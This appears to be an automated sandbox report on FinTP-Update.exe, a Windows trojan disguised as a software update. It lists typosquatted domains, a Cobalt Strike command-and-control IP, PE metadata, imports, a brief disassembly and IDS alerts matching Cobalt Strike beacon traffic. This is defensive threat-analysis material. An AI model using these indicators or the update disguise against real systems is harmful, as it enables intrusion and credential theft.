                                                                                                        https://www.finttp.ro/rss/portallogin-gettask.htmlRUFinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.finttp.ro/ss/portallogin-gettask.htmlFinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.flntp.ro/rss/portallogin-gettask.html&FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.finttp.ro/rss/portallogin-gettask.htmlmtFinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.finttp.ro/rss/portallogin-gettask.htmlopleFinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.finttp.ro/rss/portallogin-gettask.htmlmwFinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.finttp.ro/rss/portallogin-gettask.htmlerFinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.finttp.ro/rss/portallogin-gettask.htmlPFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://www.finttp.ro/rss/portallogin-gettask.htmlSFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.flntp.ro/rss/portallogin-gettask.htmlAwtdFinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
IP:3.79.209.76
Domain:ec2-3-79-209-76.eu-central-1.compute.amazonaws.com
Country:United States
ASN:16509
ASN Name:AMAZON-02US
Malicious:true
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1578576
                                                                                                                            Start date and time:2024-12-19 23:11:09 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 4m 36s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:5
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:FinTP-Update.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.evad.winEXE@2/1@3/1
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 92%
                                                                                                                            • Number of executed functions: 13
                                                                                                                            • Number of non-executed functions: 46
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200, 20.109.210.53
                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: FinTP-Update.exe
Time:17:12:13
Type:API Interceptor
Description:53x Sleep call for process: FinTP-Update.exe modified
Match:3.79.209.76
Associated Sample Name / URL, Detection, Threat Name, Context:
• hrupdate.exe, malicious, CobaltStrike, www.hrtraining.ro/trainingcheck_v5498
• hrupdate.exe, malicious, CobaltStrike, www.hrtraining.ro/trainingcheck_v5498
Match:ec2-3-79-209-76.eu-central-1.compute.amazonaws.com
Associated Sample Name / URL, Detection, Threat Name, Context:
• hrupdate.exe, malicious, CobaltStrike, 3.79.209.76
• hrupdate.exe, malicious, CobaltStrike, 3.79.209.76
Match:AMAZON-02US
Associated Sample Name / URL, Detection, Threat Name, Context:
• hrupdate.exe, malicious, CobaltStrike, 3.79.209.76
• hrupdate.exe, malicious, CobaltStrike, 3.79.209.76
Match:37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL, Detection, Threat Name, Context:
• hrupdate.exe, malicious, CobaltStrike, 3.79.209.76
• hrupdate.exe, malicious, CobaltStrike, 3.79.209.76
• billys.exe, malicious, Meduza Stealer, 3.79.209.76
• ruppert.exe, malicious, CredGrabber, Meduza Stealer, 3.79.209.76
• file.exe, malicious, ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, 3.79.209.76
• 2JSGOlbNym.dll, malicious, Unknown, 3.79.209.76
• 4hSuRTwnWJ.dll, malicious, Unknown, 3.79.209.76
• QCTYoyX422.dll, malicious, Unknown, 3.79.209.76
• PURCHASE ORDER TRC-090971819130-24_pdf.exe, malicious, GuLoader, MassLogger RAT, 3.79.209.76
• PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, malicious, GuLoader, MassLogger RAT, 3.79.209.76
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):41
                                                                                                                            Entropy (8bit):3.8484226636198593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:gBg+/JYMQx4QREyE:gu+64EEX
                                                                                                                            MD5:EB01545BDD05DACC85CAE657B84AEBF7
                                                                                                                            SHA1:120DFABDDCAC09EFD0CF6B51DF66985EDC925A92
                                                                                                                            SHA-256:FC5D573FDC90B7D646A81678A80DEDD01111C834C4BAD1AB8CAF9FE08B0CEF20
                                                                                                                            SHA-512:491FDA0776BD799034F8F6B70921F84033B360BB0F69CFCD3E3D80ED51AA122E781F743FA3019A206080F815CDA68C39C5C5700A6A5FBDD7E2E195C8474A2783
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:Updating application ...Update complete !
                                                                                                                            File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                            Entropy (8bit):5.197761251011201
                                                                                                                            TrID:
                                                                                                                            • Win64 Executable Console (202006/5) 92.65%
                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:FinTP-Update.exe
                                                                                                                            File size:18'432 bytes
                                                                                                                            MD5:4038d28c25e96e0e4045b3bc1093f497
                                                                                                                            SHA1:0e2dcc88362b508e3b317b890809fc7a7b37915d
                                                                                                                            SHA256:87ae2867d3cd63d4dcefe95d7ada9cba63d77ac8d1b739177f0c7870ce0472b3
                                                                                                                            SHA512:2326b0e7ded40fe06b3e8ef4597e7c6561f16fae52e9e1261d3b61b893b852f720c968dd33b24d0071862964a372382be2eb72344daaca0ff8c31b7f8e1810f2
                                                                                                                            SSDEEP:384:Xaqwn0tqJwfoapam/++FYLlVKZAopdGeV365sa:RGapExVKZAoP53e
                                                                                                                            TLSH:3D825C8BB7814DEAC22B8139C5234E61E2B335561313A3CF5750463D1EB67A17D2BB44
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..i...i...i.......i...l...i...m...i...j...i...h...i...h...i...h...i...`...i.......i...k...i.Rich..i........................
                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                            Entrypoint:0x1400021c0
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x140000000
                                                                                                                            Subsystem:windows cui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x670643E0 [Wed Oct 9 08:50:40 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:6
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:6
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:6
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:ec86b294c5b5658fce37dee49cec46c7
                                                                                                                            Instruction
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            call 00007F8028D365ECh
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            jmp 00007F8028D35E77h
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            inc eax
                                                                                                                            push ebx
                                                                                                                            dec eax
                                                                                                                            sub esp, 20h
                                                                                                                            dec eax
                                                                                                                            mov ebx, ecx
                                                                                                                            xor ecx, ecx
                                                                                                                            call dword ptr [00000E63h]
                                                                                                                            dec eax
                                                                                                                            mov ecx, ebx
                                                                                                                            call dword ptr [00000E52h]
                                                                                                                            call dword ptr [00000E5Ch]
                                                                                                                            dec eax
                                                                                                                            mov ecx, eax
                                                                                                                            mov edx, C0000409h
                                                                                                                            dec eax
                                                                                                                            add esp, 20h
                                                                                                                            pop ebx
                                                                                                                            dec eax
                                                                                                                            jmp dword ptr [00000E50h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [esp+08h], ecx
                                                                                                                            dec eax
                                                                                                                            sub esp, 38h
                                                                                                                            mov ecx, 00000017h
                                                                                                                            call 00007F8028D36B9Ah
                                                                                                                            test eax, eax
                                                                                                                            je 00007F8028D36009h
                                                                                                                            mov ecx, 00000002h
                                                                                                                            int 29h
                                                                                                                            dec eax
                                                                                                                            lea ecx, dword ptr [00002F53h]
                                                                                                                            call 00007F8028D360AFh
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [0000303Ah], eax
                                                                                                                            dec eax
                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            add eax, 08h
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [00002FCAh], eax
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [00003023h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [00002E94h], eax
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [esp+40h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [00002F98h], eax
                                                                                                                            mov dword ptr [00002E6Eh], C0000409h
                                                                                                                            mov dword ptr [00002E68h], 00000001h
                                                                                                                            mov dword ptr [00002E72h], 00000001h
                                                                                                                            mov eax, 00000008h
                                                                                                                            Programming Language:
                                                                                                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3f24 | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6000 | 0x294 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0x44 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3520 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3590 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x2c8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1f5a | 0x2000 | f28ee29010e5282f3f2ab20b895128ad | False | 0.5806884765625 | data | 6.093948037110834 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3000 | 0x1902 | 0x1a00 | a795f19daba72a2b91764ca9a85fa91b | False | 0.36959134615384615 | data | 4.041616473395526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5000 | 0x870 | 0x200 | 30de300d24987415055f0b39f5ed59e1 | False | 0.23046875 | data | 1.9906479179666972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6000 | 0x294 | 0x400 | 9722c1a8ec412a852dd87736612b0cec | False | 0.3466796875 | PEX Binary Archive | 2.82838019078331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x7000 | 0x1e0 | 0x200 | 0b35de07beeb30d1d6013cbca2846303 | False | 0.525390625 | data | 4.701503258251789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0x44 | 0x200 | 83d2ddaef3138e3b8be18529f8ef1ac0 | False | 0.162109375 | data | 0.8870350921530159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x7060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | VirtualProtect, VirtualAlloc, WaitForSingleObject, Sleep, CreateThread, GetConsoleWindow, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, RtlCaptureContext
USER32.dll | ShowWindow
MSVCP140.dll | ?_Xout_of_range@std@@YAXPEBD@Z, ?_Xlength_error@std@@YAXPEBD@Z
WS2_32.dll | connect, WSACleanup, closesocket, gethostbyname, socket, htons, WSAStartup, inet_addr, gethostbyaddr, send, recv
VCRUNTIME140.dll | __std_exception_copy, __std_exception_destroy, __C_specific_handler, memset, strstr, __CxxFrameHandler3, memcmp, memcpy, _CxxThrowException, memchr, memmove
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf, _set_fmode, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
api-ms-win-crt-heap-l1-1-0.dll | malloc, free, realloc, _callnewh, _set_new_mode
api-ms-win-crt-string-l1-1-0.dll | strncpy
api-ms-win-crt-runtime-l1-1-0.dll | _register_onexit_function, _crt_atexit, __p___argv, _register_thread_local_exe_atexit_callback, __p___argc, _exit, _cexit, terminate, _invalid_parameter_noinfo_noreturn, exit, _initterm_e, _initterm, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, _initialize_onexit_table, _get_initial_narrow_environment
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T23:12:10.800926+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49704 | 3.79.209.76 | 80 | TCP
2024-12-19T23:12:14.340202+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49705 | TCP
2024-12-19T23:12:17.271253+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49706 | TCP
2024-12-19T23:12:19.484501+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49707 | TCP
2024-12-19T23:12:21.689438+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49708 | TCP
2024-12-19T23:12:23.938801+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49710 | TCP
2024-12-19T23:12:26.146640+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49717 | TCP
2024-12-19T23:12:28.623297+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49725 | TCP
2024-12-19T23:12:30.852350+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49731 | TCP
2024-12-19T23:12:33.070480+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49738 | TCP
2024-12-19T23:12:35.362742+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49744 | TCP
2024-12-19T23:12:37.619541+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49750 | TCP
2024-12-19T23:12:39.835436+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49756 | TCP
2024-12-19T23:12:42.073130+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49762 | TCP
2024-12-19T23:12:44.255883+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49768 | TCP
2024-12-19T23:12:46.455049+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49773 | TCP
2024-12-19T23:12:48.678819+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49780 | TCP
2024-12-19T23:12:50.867126+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49786 | TCP
2024-12-19T23:12:53.332796+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49792 | TCP
2024-12-19T23:12:55.536771+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49798 | TCP
2024-12-19T23:12:57.727238+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49804 | TCP
2024-12-19T23:12:59.923490+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49810 | TCP
2024-12-19T23:13:02.414598+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49816 | TCP
2024-12-19T23:13:04.713196+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49822 | TCP
2024-12-19T23:13:07.154589+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49829 | TCP
2024-12-19T23:13:09.360049+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49835 | TCP
2024-12-19T23:13:11.606752+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49843 | TCP
2024-12-19T23:13:13.817857+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49850 | TCP
2024-12-19T23:13:16.063530+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49856 | TCP
2024-12-19T23:13:18.263363+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49862 | TCP
